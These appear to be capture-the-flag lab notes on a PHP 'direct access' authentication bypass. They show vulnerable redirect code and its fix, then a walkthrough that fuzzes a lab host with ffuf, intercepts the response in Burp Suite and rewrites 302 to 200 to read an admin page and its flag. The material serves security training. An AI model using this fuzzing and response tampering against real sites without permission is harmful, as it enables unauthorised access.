DIRECT ACCESS

this is the most straightforward way of bypassing authentication checks: the protected resource is requested directly from an unauthenticated context. the attacker then accesses the protected information if the web application does not properly verify that the request is authenticated.

#original vulnerable php code
#This code redirects the user to /index.php if the session is not active (the user is not authenticated). However, the PHP script does not stop execution after sending the Location header, so the protected information within the page is still sent in the body of the redirect response
if(!$_SESSION['active']) {
  header("Location: index.php");
} // no exit after the redirect: execution continues and the protected page is still rendered into the 302 body


#mitigation
#To prevent the protected information from being returned in the body of the redirect response, the PHP script needs to exit immediately after issuing the redirect (header() only sets a response header; it does not stop execution)
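# Mitigation: redirect unauthenticated requests and stop the script so that no
# protected content follows the Location header in the response body.
# empty() also covers a session that has no 'active' key at all (no
# undefined-array-key notice); the redirect outcome is the same as !$_SESSION['active'].
if (empty($_SESSION['active'])) {
  header("Location: index.php");
  exit; // header() does not stop execution; without this the page body is still sent
}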
#
root@oco:~$ locate web-extension*
 /usr/share/seclists/Discovery/Web-Content/web-extensions.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/web-extensions.txt .

#identify the extension the site uses
root@oco:~$ ffuf -w web-extensions.txt:FUZZ -u http://94.237.62.184:39910/indexFUZZ
 * .php  [Status: 200, Size: 2971, Words: 638, Lines: 97, Duration: 4328ms]

root@oco:~$ locate *directory-list*
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .

#fuzz for admin pages, etc
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.62.184:39910/FUZZ.php -t 100 -ic
 admin [Status: 302, Size: 14465, Words: 4165, Lines: 429, Duration: 77ms]
 * the output may list different sizes
    - size 0 means no content or empty page
    - size > 0 means the page contains content
    
#verify identified pages
root@oco:~$ curl http://94.237.62.184:39910/admin.php

#intercept requests and test for direct access authentication bypass
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
BURP > Proxy > Requests > right-click > Do intercept > Response to this request > Forward
 Request
  ...
  GET /admin.php HTTP/1.1
  Host: 94.237.62.184:39910
  Cookie: PHPSESSID=e4b4gmh75rbp9k90n2l23rfv39
  Connection: close

BURP > Proxy > Response > Forward
 Response
  ...
  HTTP/1.1 302 Found                      // change this to 200 OK
  Date: Wed, 25 Dec 2024 19:13:30 GMT
  Server: Apache/2.4.59 (Debian)
  Location: index.php
  Connection: close
  
  Modifications...
  HTTP/1.1 200 OK
  
root@oco:~$ BROWSER > http://94.237.62.184:39910/admin.php
 * HTB{913ab2d84b8db21854c696dee1f1db68}
